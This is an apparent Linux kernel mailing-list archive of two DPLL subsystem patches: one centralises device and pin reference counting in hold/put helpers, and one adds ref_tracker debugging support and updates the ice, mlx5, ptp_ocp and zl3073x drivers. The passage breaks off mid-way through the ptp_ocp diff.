Refactor the reference counting mechanism for DPLL devices and pins to improve consistency and prevent potential lifetime issues. Introduce internal helpers __dpll_{device,pin}_{hold,put}() to centralize reference management. Update the internal XArray reference helpers (dpll_xa_ref_*) to automatically grab a reference to the target object when it is added to a list, and release it when removed. This ensures that objects linked internally (e.g., pins referenced by parent pins) are properly kept alive without relying on the caller to manually manage the count. Consequently, remove the now redundant manual `refcount_inc/dec` calls in `dpll_pin_on_pin_{,un}register()`, as ownership is now correctly handled by the dpll_xa_ref_* functions. Additionally, make `dpll_device_{,un}register()` take/release a reference to the device, so the device object remains valid for the duration of its registration. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/dpll_core.c | 74 +++++++++++++++++++++++++++------------- 1 file changed, 50 insertions(+), 24 deletions(-) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index 59081cf2c73ae..f6ab4f0cad84d 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -83,6 +83,45 @@ void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) call_dpll_notifiers(action, &info); } +static void __dpll_device_hold(struct dpll_device *dpll) +{ + refcount_inc(&dpll->refcount); +} + +static void __dpll_device_put(struct dpll_device *dpll) +{ + if (refcount_dec_and_test(&dpll->refcount)) { + ASSERT_DPLL_NOT_REGISTERED(dpll); + WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); + xa_destroy(&dpll->pin_refs); + xa_erase(&dpll_device_xa, dpll->id); + WARN_ON(!list_empty(&dpll->registration_list)); + kfree(dpll); + } +} + +static void __dpll_pin_hold(struct dpll_pin *pin) +{ + refcount_inc(&pin->refcount); +} + +static void 
dpll_pin_idx_free(u32 pin_idx); +static void dpll_pin_prop_free(struct dpll_pin_properties *prop); + +static void __dpll_pin_put(struct dpll_pin *pin) +{ + if (refcount_dec_and_test(&pin->refcount)) { + xa_erase(&dpll_pin_xa, pin->id); + xa_destroy(&pin->dpll_refs); + xa_destroy(&pin->parent_refs); + xa_destroy(&pin->ref_sync_pins); + dpll_pin_prop_free(&pin->prop); + fwnode_handle_put(pin->fwnode); + dpll_pin_idx_free(pin->pin_idx); + kfree_rcu(pin, rcu); + } +} + struct dpll_device *dpll_device_get_by_id(int id) { if (xa_get_mark(&dpll_device_xa, id, DPLL_REGISTERED)) @@ -152,6 +191,7 @@ dpll_xa_ref_pin_add(struct xarray *xa_pins, struct dpll_pin *pin, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; + __dpll_pin_hold(pin); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -174,6 +214,7 @@ static int dpll_xa_ref_pin_del(struct xarray *xa_pins, struct dpll_pin *pin, if (WARN_ON(!reg)) return -EINVAL; list_del(&reg->list); + __dpll_pin_put(pin); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_pins, i); @@ -231,6 +272,7 @@ dpll_xa_ref_dpll_add(struct xarray *xa_dplls, struct dpll_device *dpll, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; + __dpll_device_hold(dpll); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -253,6 +295,7 @@ dpll_xa_ref_dpll_del(struct xarray *xa_dplls, struct dpll_device *dpll, if (WARN_ON(!reg)) return; list_del(&reg->list); + __dpll_device_put(dpll); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_dplls, i); @@ -323,8 +366,8 @@ dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) if (dpll->clock_id == clock_id && dpll->device_idx == device_idx && dpll->module == module) { + __dpll_device_hold(dpll); ret = dpll; - refcount_inc(&ret->refcount); break; } } @@ -347,14 +390,7 @@ EXPORT_SYMBOL_GPL(dpll_device_get); void dpll_device_put(struct dpll_device *dpll) { 
mutex_lock(&dpll_lock); - if (refcount_dec_and_test(&dpll->refcount)) { - ASSERT_DPLL_NOT_REGISTERED(dpll); - WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); - xa_destroy(&dpll->pin_refs); - xa_erase(&dpll_device_xa, dpll->id); - WARN_ON(!list_empty(&dpll->registration_list)); - kfree(dpll); - } + __dpll_device_put(dpll); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_device_put); @@ -416,6 +452,7 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, reg->ops = ops; reg->priv = priv; dpll->type = type; + __dpll_device_hold(dpll); first_registration = list_empty(&dpll->registration_list); list_add_tail(&reg->list, &dpll->registration_list); if (!first_registration) { @@ -455,6 +492,7 @@ void dpll_device_unregister(struct dpll_device *dpll, return; } list_del(&reg->list); + __dpll_device_put(dpll); kfree(reg); if (!list_empty(&dpll->registration_list)) { @@ -666,8 +704,8 @@ dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, if (pos->clock_id == clock_id && pos->pin_idx == pin_idx && pos->module == module) { + __dpll_pin_hold(pos); ret = pos; - refcount_inc(&ret->refcount); break; } } @@ -690,16 +728,7 @@ EXPORT_SYMBOL_GPL(dpll_pin_get); void dpll_pin_put(struct dpll_pin *pin) { mutex_lock(&dpll_lock); - if (refcount_dec_and_test(&pin->refcount)) { - xa_erase(&dpll_pin_xa, pin->id); - xa_destroy(&pin->dpll_refs); - xa_destroy(&pin->parent_refs); - xa_destroy(&pin->ref_sync_pins); - dpll_pin_prop_free(&pin->prop); - fwnode_handle_put(pin->fwnode); - dpll_pin_idx_free(pin->pin_idx); - kfree_rcu(pin, rcu); - } + __dpll_pin_put(pin); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); @@ -740,8 +769,8 @@ struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) mutex_lock(&dpll_lock); xa_for_each(&dpll_pin_xa, index, pin) { if (pin->fwnode == fwnode) { + __dpll_pin_hold(pin); ret = pin; - refcount_inc(&ret->refcount); break; } } @@ -893,7 +922,6 @@ int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, 
ret = dpll_xa_ref_pin_add(&pin->parent_refs, parent, ops, priv, pin); if (ret) goto unlock; - refcount_inc(&pin->refcount); xa_for_each(&parent->dpll_refs, i, ref) { ret = __dpll_pin_register(ref->dpll, pin, ops, priv, parent); if (ret) { @@ -913,7 +941,6 @@ int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, parent); dpll_pin_delete_ntf(pin); } - refcount_dec(&pin->refcount); dpll_xa_ref_pin_del(&pin->parent_refs, parent, ops, priv, pin); unlock: mutex_unlock(&dpll_lock); @@ -940,7 +967,6 @@ void dpll_pin_on_pin_unregister(struct dpll_pin *parent, struct dpll_pin *pin, mutex_lock(&dpll_lock); dpll_pin_delete_ntf(pin); dpll_xa_ref_pin_del(&pin->parent_refs, parent, ops, priv, pin); - refcount_dec(&pin->refcount); xa_for_each(&pin->dpll_refs, i, ref) __dpll_pin_unregister(ref->dpll, pin, ops, priv, parent); mutex_unlock(&dpll_lock); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:35 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
Add support for the REF_TRACKER infrastructure to the DPLL subsystem. When enabled, this allows developers to track and debug reference counting leaks or imbalances for dpll_device and dpll_pin objects. It records stack traces for every get/put operation and exposes this information via debugfs at: /sys/kernel/debug/ref_tracker/dpll_device_* /sys/kernel/debug/ref_tracker/dpll_pin_* The following API changes are made to support this: 1. dpll_device_get() / dpll_device_put() now accept a 'dpll_tracker *' (which is a typedef to 'struct ref_tracker *' when enabled, or an empty struct otherwise). 2. dpll_pin_get() / dpll_pin_put() and fwnode_dpll_pin_find() similarly accept the tracker argument. 3. Internal registration structures now hold a tracker to associate the reference held by the registration with the specific owner. All existing in-tree drivers (ice, mlx5, ptp_ocp, zl3073x) are updated to pass NULL for the new tracker argument, maintaining current behavior while enabling future debugging capabilities. 
Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Co-developed-by: Petr Oros <poros@redhat.com> Signed-off-by: Petr Oros <poros@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v4: * added missing tracker parameter to fwnode_dpll_pin_find() stub v3: * added Kconfig dependency on STACKTRACE_SUPPORT and DEBUG_KERNEL --- drivers/dpll/Kconfig | 15 +++ drivers/dpll/dpll_core.c | 98 ++++++++++++++----- drivers/dpll/dpll_core.h | 5 + drivers/dpll/zl3073x/dpll.c | 12 +-- drivers/net/ethernet/intel/ice/ice_dpll.c | 14 +-- .../net/ethernet/mellanox/mlx5/core/dpll.c | 13 +-- drivers/ptp/ptp_ocp.c | 15 +-- include/linux/dpll.h | 21 ++-- 8 files changed, 139 insertions(+), 54 deletions(-) diff --git a/drivers/dpll/Kconfig b/drivers/dpll/Kconfig index ade872c915ac6..be98969f040ab 100644 --- a/drivers/dpll/Kconfig +++ b/drivers/dpll/Kconfig @@ -8,6 +8,21 @@ menu "DPLL device support" config DPLL bool +config DPLL_REFCNT_TRACKER + bool "DPLL reference count tracking" + depends on DEBUG_KERNEL && STACKTRACE_SUPPORT && DPLL + select REF_TRACKER + help + Enable reference count tracking for DPLL devices and pins. + This helps debugging reference leaks and use-after-free bugs + by recording stack traces for each get/put operation. + + The tracking information is exposed via debugfs at: + /sys/kernel/debug/ref_tracker/dpll_device_* + /sys/kernel/debug/ref_tracker/dpll_pin_* + + If unsure, say N. 
+ source "drivers/dpll/zl3073x/Kconfig" endmenu diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index f6ab4f0cad84d..627a5b39a0efd 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -41,6 +41,7 @@ struct dpll_device_registration { struct list_head list; const struct dpll_device_ops *ops; void *priv; + dpll_tracker tracker; }; struct dpll_pin_registration { @@ -48,6 +49,7 @@ struct dpll_pin_registration { const struct dpll_pin_ops *ops; void *priv; void *cookie; + dpll_tracker tracker; }; static int call_dpll_notifiers(unsigned long action, void *info) @@ -83,33 +85,68 @@ void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) call_dpll_notifiers(action, &info); } -static void __dpll_device_hold(struct dpll_device *dpll) +static void dpll_device_tracker_alloc(struct dpll_device *dpll, + dpll_tracker *tracker) { +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_alloc(&dpll->refcnt_tracker, tracker, GFP_KERNEL); +#endif +} + +static void dpll_device_tracker_free(struct dpll_device *dpll, + dpll_tracker *tracker) +{ +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_free(&dpll->refcnt_tracker, tracker); +#endif +} + +static void __dpll_device_hold(struct dpll_device *dpll, dpll_tracker *tracker) +{ + dpll_device_tracker_alloc(dpll, tracker); refcount_inc(&dpll->refcount); } -static void __dpll_device_put(struct dpll_device *dpll) +static void __dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker) { + dpll_device_tracker_free(dpll, tracker); if (refcount_dec_and_test(&dpll->refcount)) { ASSERT_DPLL_NOT_REGISTERED(dpll); WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); xa_destroy(&dpll->pin_refs); xa_erase(&dpll_device_xa, dpll->id); WARN_ON(!list_empty(&dpll->registration_list)); + ref_tracker_dir_exit(&dpll->refcnt_tracker); kfree(dpll); } } -static void __dpll_pin_hold(struct dpll_pin *pin) +static void dpll_pin_tracker_alloc(struct dpll_pin *pin, dpll_tracker *tracker) { +#ifdef CONFIG_DPLL_REFCNT_TRACKER + 
ref_tracker_alloc(&pin->refcnt_tracker, tracker, GFP_KERNEL); +#endif +} + +static void dpll_pin_tracker_free(struct dpll_pin *pin, dpll_tracker *tracker) +{ +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_free(&pin->refcnt_tracker, tracker); +#endif +} + +static void __dpll_pin_hold(struct dpll_pin *pin, dpll_tracker *tracker) +{ + dpll_pin_tracker_alloc(pin, tracker); refcount_inc(&pin->refcount); } static void dpll_pin_idx_free(u32 pin_idx); static void dpll_pin_prop_free(struct dpll_pin_properties *prop); -static void __dpll_pin_put(struct dpll_pin *pin) +static void __dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker) { + dpll_pin_tracker_free(pin, tracker); if (refcount_dec_and_test(&pin->refcount)) { xa_erase(&dpll_pin_xa, pin->id); xa_destroy(&pin->dpll_refs); @@ -118,6 +155,7 @@ static void __dpll_pin_put(struct dpll_pin *pin) dpll_pin_prop_free(&pin->prop); fwnode_handle_put(pin->fwnode); dpll_pin_idx_free(pin->pin_idx); + ref_tracker_dir_exit(&pin->refcnt_tracker); kfree_rcu(pin, rcu); } } @@ -191,7 +229,7 @@ dpll_xa_ref_pin_add(struct xarray *xa_pins, struct dpll_pin *pin, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; - __dpll_pin_hold(pin); + __dpll_pin_hold(pin, &reg->tracker); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -214,7 +252,7 @@ static int dpll_xa_ref_pin_del(struct xarray *xa_pins, struct dpll_pin *pin, if (WARN_ON(!reg)) return -EINVAL; list_del(&reg->list); - __dpll_pin_put(pin); + __dpll_pin_put(pin, &reg->tracker); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_pins, i); @@ -272,7 +310,7 @@ dpll_xa_ref_dpll_add(struct xarray *xa_dplls, struct dpll_device *dpll, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, &reg->tracker); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -295,7 +333,7 @@ dpll_xa_ref_dpll_del(struct xarray 
*xa_dplls, struct dpll_device *dpll, if (WARN_ON(!reg)) return; list_del(&reg->list); - __dpll_device_put(dpll); + __dpll_device_put(dpll, &reg->tracker); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_dplls, i); @@ -337,6 +375,7 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) return ERR_PTR(ret); } xa_init_flags(&dpll->pin_refs, XA_FLAGS_ALLOC); + ref_tracker_dir_init(&dpll->refcnt_tracker, 128, "dpll_device"); return dpll; } @@ -346,6 +385,7 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) * @clock_id: clock_id of creator * @device_idx: idx given by device driver * @module: reference to registering module + * @tracker: tracking object for the acquired reference * * Get existing object of a dpll device, unique for given arguments. * Create new if doesn't exist yet. @@ -356,7 +396,8 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) * * ERR_PTR(X) - error */ struct dpll_device * -dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) +dpll_device_get(u64 clock_id, u32 device_idx, struct module *module, + dpll_tracker *tracker) { struct dpll_device *dpll, *ret = NULL; unsigned long index; @@ -366,13 +407,17 @@ dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) if (dpll->clock_id == clock_id && dpll->device_idx == device_idx && dpll->module == module) { - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, tracker); ret = dpll; break; } } - if (!ret) + if (!ret) { ret = dpll_device_alloc(clock_id, device_idx, module); + if (!IS_ERR(ret)) + dpll_device_tracker_alloc(ret, tracker); + } + mutex_unlock(&dpll_lock); return ret; @@ -382,15 +427,16 @@ EXPORT_SYMBOL_GPL(dpll_device_get); /** * dpll_device_put - decrease the refcount and free memory if possible * @dpll: dpll_device struct pointer + * @tracker: tracking object for the acquired reference * * Context: Acquires a lock (dpll_lock) * Drop reference for a dpll device, if 
all references are gone, delete * dpll device object. */ -void dpll_device_put(struct dpll_device *dpll) +void dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker) { mutex_lock(&dpll_lock); - __dpll_device_put(dpll); + __dpll_device_put(dpll, tracker); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_device_put); @@ -452,7 +498,7 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, reg->ops = ops; reg->priv = priv; dpll->type = type; - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, &reg->tracker); first_registration = list_empty(&dpll->registration_list); list_add_tail(&reg->list, &dpll->registration_list); if (!first_registration) { @@ -492,7 +538,7 @@ void dpll_device_unregister(struct dpll_device *dpll, return; } list_del(&reg->list); - __dpll_device_put(dpll); + __dpll_device_put(dpll, &reg->tracker); kfree(reg); if (!list_empty(&dpll->registration_list)) { @@ -622,6 +668,7 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, &dpll_pin_xa_id, GFP_KERNEL); if (ret < 0) goto err_xa_alloc; + ref_tracker_dir_init(&pin->refcnt_tracker, 128, "dpll_pin"); return pin; err_xa_alloc: xa_destroy(&pin->dpll_refs); @@ -683,6 +730,7 @@ EXPORT_SYMBOL_GPL(unregister_dpll_notifier); * @pin_idx: idx given by dev driver * @module: reference to registering module * @prop: dpll pin properties + * @tracker: tracking object for the acquired reference * * Get existing object of a pin (unique for given arguments) or create new * if doesn't exist yet. 
@@ -694,7 +742,7 @@ EXPORT_SYMBOL_GPL(unregister_dpll_notifier); */ struct dpll_pin * dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, - const struct dpll_pin_properties *prop) + const struct dpll_pin_properties *prop, dpll_tracker *tracker) { struct dpll_pin *pos, *ret = NULL; unsigned long i; @@ -704,13 +752,16 @@ dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, if (pos->clock_id == clock_id && pos->pin_idx == pin_idx && pos->module == module) { - __dpll_pin_hold(pos); + __dpll_pin_hold(pos, tracker); ret = pos; break; } } - if (!ret) + if (!ret) { ret = dpll_pin_alloc(clock_id, pin_idx, module, prop); + if (!IS_ERR(ret)) + dpll_pin_tracker_alloc(ret, tracker); + } mutex_unlock(&dpll_lock); return ret; @@ -720,15 +771,16 @@ EXPORT_SYMBOL_GPL(dpll_pin_get); /** * dpll_pin_put - decrease the refcount and free memory if possible * @pin: pointer to a pin to be put + * @tracker: tracking object for the acquired reference * * Drop reference for a pin, if all references are gone, delete pin object. * * Context: Acquires a lock (dpll_lock) */ -void dpll_pin_put(struct dpll_pin *pin) +void dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker) { mutex_lock(&dpll_lock); - __dpll_pin_put(pin); + __dpll_pin_put(pin, tracker); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); @@ -752,6 +804,7 @@ EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); /** * fwnode_dpll_pin_find - find dpll pin by firmware node reference * @fwnode: reference to firmware node + * @tracker: tracking object for the acquired reference * * Get existing object of a pin that is associated with given firmware node * reference. 
@@ -761,7 +814,8 @@ EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); * * valid dpll_pin pointer on success * * NULL when no such pin exists */ -struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode, + dpll_tracker *tracker) { struct dpll_pin *pin, *ret = NULL; unsigned long index; @@ -769,7 +823,7 @@ struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) mutex_lock(&dpll_lock); xa_for_each(&dpll_pin_xa, index, pin) { if (pin->fwnode == fwnode) { - __dpll_pin_hold(pin); + __dpll_pin_hold(pin, tracker); ret = pin; break; } diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h index b7b4bb251f739..71ac88ef20172 100644 --- a/drivers/dpll/dpll_core.h +++ b/drivers/dpll/dpll_core.h @@ -10,6 +10,7 @@ #include <linux/dpll.h> #include <linux/list.h> #include <linux/refcount.h> +#include <linux/ref_tracker.h> #include "dpll_nl.h" #define DPLL_REGISTERED XA_MARK_1 @@ -23,6 +24,7 @@ * @type: type of a dpll * @pin_refs: stores pins registered within a dpll * @refcount: refcount + * @refcnt_tracker: ref_tracker directory for debugging reference leaks * @registration_list: list of registered ops and priv data of dpll owners **/ struct dpll_device { @@ -33,6 +35,7 @@ struct dpll_device { enum dpll_type type; struct xarray pin_refs; refcount_t refcount; + struct ref_tracker_dir refcnt_tracker; struct list_head registration_list; }; @@ -48,6 +51,7 @@ struct dpll_device { * @ref_sync_pins: hold references to pins for Reference SYNC feature * @prop: pin properties copied from the registerer * @refcount: refcount + * @refcnt_tracker: ref_tracker directory for debugging reference leaks * @rcu: rcu_head for kfree_rcu() **/ struct dpll_pin { @@ -61,6 +65,7 @@ struct dpll_pin { struct xarray ref_sync_pins; struct dpll_pin_properties prop; refcount_t refcount; + struct ref_tracker_dir refcnt_tracker; struct rcu_head rcu; }; diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c 
index 9eed21088adac..8788bcab7ec53 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -1480,7 +1480,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) /* Create or get existing DPLL pin */ pin->dpll_pin = dpll_pin_get(zldpll->dev->clock_id, index, THIS_MODULE, - &props->dpll_props); + &props->dpll_props, NULL); if (IS_ERR(pin->dpll_pin)) { rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; @@ -1503,7 +1503,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) return 0; err_register: - dpll_pin_put(pin->dpll_pin); + dpll_pin_put(pin->dpll_pin, NULL); err_prio_get: pin->dpll_pin = NULL; err_pin_get: @@ -1534,7 +1534,7 @@ zl3073x_dpll_pin_unregister(struct zl3073x_dpll_pin *pin) /* Unregister the pin */ dpll_pin_unregister(zldpll->dpll_dev, pin->dpll_pin, ops, pin); - dpll_pin_put(pin->dpll_pin); + dpll_pin_put(pin->dpll_pin, NULL); pin->dpll_pin = NULL; } @@ -1708,7 +1708,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) dpll_mode_refsel); zldpll->dpll_dev = dpll_device_get(zldev->clock_id, zldpll->id, - THIS_MODULE); + THIS_MODULE, NULL); if (IS_ERR(zldpll->dpll_dev)) { rc = PTR_ERR(zldpll->dpll_dev); zldpll->dpll_dev = NULL; @@ -1720,7 +1720,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) zl3073x_prop_dpll_type_get(zldev, zldpll->id), &zl3073x_dpll_device_ops, zldpll); if (rc) { - dpll_device_put(zldpll->dpll_dev); + dpll_device_put(zldpll->dpll_dev, NULL); zldpll->dpll_dev = NULL; } @@ -1743,7 +1743,7 @@ zl3073x_dpll_device_unregister(struct zl3073x_dpll *zldpll) dpll_device_unregister(zldpll->dpll_dev, &zl3073x_dpll_device_ops, zldpll); - dpll_device_put(zldpll->dpll_dev); + dpll_device_put(zldpll->dpll_dev, NULL); zldpll->dpll_dev = NULL; } diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 53b54e395a2ed..64b7b045ecd58 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c 
@@ -2814,7 +2814,7 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin); + dpll_pin_put(pins[i].pin, NULL); } /** @@ -2840,7 +2840,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, for (i = 0; i < count; i++) { pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, - &pins[i].prop); + &pins[i].prop, NULL); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); goto release_pins; @@ -2851,7 +2851,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, release_pins: while (--i >= 0) - dpll_pin_put(pins[i].pin); + dpll_pin_put(pins[i].pin, NULL); return ret; } @@ -3037,7 +3037,7 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) if (WARN_ON_ONCE(!vsi || !vsi->netdev)) return; dpll_netdev_pin_clear(vsi->netdev); - dpll_pin_put(rclk->pin); + dpll_pin_put(rclk->pin, NULL); } /** @@ -3247,7 +3247,7 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) { if (cgu) dpll_device_unregister(d->dpll, d->ops, d); - dpll_device_put(d->dpll); + dpll_device_put(d->dpll, NULL); } /** @@ -3271,7 +3271,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, u64 clock_id = pf->dplls.clock_id; int ret; - d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE); + d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, NULL); if (IS_ERR(d->dpll)) { ret = PTR_ERR(d->dpll); dev_err(ice_pf_to_dev(pf), @@ -3287,7 +3287,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ice_dpll_update_state(pf, d, true); ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { - dpll_device_put(d->dpll); + dpll_device_put(d->dpll, NULL); return ret; } d->ops = ops; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c index 3ea8a1766ae28..541d83e5d7183 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c +++ 
b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c @@ -438,7 +438,7 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, auxiliary_set_drvdata(adev, mdpll); /* Multiple mdev instances might share one DPLL device. */ - mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE); + mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, NULL); if (IS_ERR(mdpll->dpll)) { err = PTR_ERR(mdpll->dpll); goto err_free_mdpll; @@ -451,7 +451,8 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, /* Multiple mdev instances might share one DPLL pin. */ mdpll->dpll_pin = dpll_pin_get(clock_id, mlx5_get_dev_index(mdev), - THIS_MODULE, &mlx5_dpll_pin_properties); + THIS_MODULE, &mlx5_dpll_pin_properties, + NULL); if (IS_ERR(mdpll->dpll_pin)) { err = PTR_ERR(mdpll->dpll_pin); goto err_unregister_dpll_device; @@ -479,11 +480,11 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); err_put_dpll_pin: - dpll_pin_put(mdpll->dpll_pin); + dpll_pin_put(mdpll->dpll_pin, NULL); err_unregister_dpll_device: dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); err_put_dpll_device: - dpll_device_put(mdpll->dpll); + dpll_device_put(mdpll->dpll, NULL); err_free_mdpll: kfree(mdpll); return err; @@ -499,9 +500,9 @@ static void mlx5_dpll_remove(struct auxiliary_device *adev) destroy_workqueue(mdpll->wq); dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); - dpll_pin_put(mdpll->dpll_pin); + dpll_pin_put(mdpll->dpll_pin, NULL); dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); - dpll_device_put(mdpll->dpll); + dpll_device_put(mdpll->dpll, NULL); kfree(mdpll); mlx5_dpll_synce_status_set(mdev, diff --git a/drivers/ptp/ptp_ocp.c b/drivers/ptp/ptp_ocp.c index 65fe05cac8c42..f39b3966b3e8c 100644 --- a/drivers/ptp/ptp_ocp.c +++ b/drivers/ptp/ptp_ocp.c @@ -4788,7 +4788,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) 
devlink_register(devlink); clkid = pci_get_dsn(pdev); - bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE); + bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, NULL); if (IS_ERR(bp->dpll)) { err = PTR_ERR(bp->dpll); dev_err(&pdev->dev, "dpll_device_alloc failed\n"); @@ -4800,7 +4800,8 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) goto out; for (i = 0; i < OCP_SMA_NUM; i++) { - bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, &bp->sma[i].dpll_prop); + bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, + &bp->sma[i].dpll_prop, NULL); if (IS_ERR(bp->sma[i].dpll_pin)) { err = PTR_ERR(bp->sma[i].dpll_pin); goto out_dpll; @@ -4809,7 +4810,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) err = dpll_pin_register(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); if (err) { - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); goto out_dpll; } } @@ -4819,9 +4820,9 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) out_dpll: while (i--) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); } - dpll_device_put(bp->dpll); + dpll_device_put(bp->dpll, NULL); out: ptp_ocp_detach(bp); out_disable: @@ -4842,11 +4843,11 @@ ptp_ocp_remove(struct pci_dev *pdev) for (i = 0; i < 